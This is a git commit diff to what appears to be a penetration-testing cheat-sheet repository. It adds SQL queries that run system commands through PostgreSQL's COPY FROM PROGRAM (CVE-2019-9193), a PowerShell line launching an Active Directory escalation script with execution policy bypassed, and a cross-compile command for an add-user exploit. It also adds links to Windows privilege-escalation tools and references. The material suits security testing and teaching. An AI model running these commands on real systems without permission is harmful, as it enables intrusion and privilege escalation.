PostgreSQL RCE CVE-2019–9193 + ADAPE + WinPrivEsc Resources

2024-09-28 19:31:56 +02:00 · 2019-03-24 16:00:27 +01:00 · 2019-03-24 16:00:27 +01:00 · a509909561
commit a509909561
parent 5d1b8bca79
4 changed files with 31 additions and 2 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -70,6 +70,11 @@
  ```

 * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
+
+    ```powershell
+    powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 
+    ```
+
 * [Ping Castle](https://github.com/vletoux/pingcastle)

    ```powershell
--- a/Resources/Windows
+++ b/Resources/Windows
@ -27,7 +27,8 @@
    ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
    ```
 - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated. ](https://github.com/abatchy17/WindowsExploits)
+- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
+- [WindowsEnumv - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
 - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
 - [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
    ```powershell
@ -500,6 +501,12 @@ List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](h
 ...
 - [MS03-026](./MS03-026) 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)  

+To cross compile a program from Kali, use the following command.
+
+```powershell
+Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
+```
+
 ## EoP - AlwaysInstallElevated

 Check if these registry values are set to "1".
@ -560,6 +567,7 @@ $ computer = "<hostname>"

 ## References

+* [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)
 * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
 * [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
 * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
@ -569,6 +577,7 @@ $ computer = "<hostname>"
 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
 * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
 * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
+* [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md)
 * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
 * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
 * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
--- a/Injection/Images/PostgreSQL_cmd_exec.png
+++ b/Injection/Images/PostgreSQL_cmd_exec.png
--- a/Injection/PostgreSQL
+++ b/Injection/PostgreSQL
@ -47,6 +47,21 @@ SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
 ```

+## PostgreSQL - Command execution
+
+CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. 
+
+```SQL
+DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already exists
+CREATE TABLE cmd_exec(cmd_output text); -- Create the table you want to hold the command output
+COPY cmd_exec FROM PROGRAM 'id';        -- Run the system command via the COPY FROM PROGRAM function
+SELECT * FROM cmd_exec;                 -- [Optional] View the results
+DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table
+```
+
+![https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png](https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png)
+
 ## References

-* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
+* [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
+* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)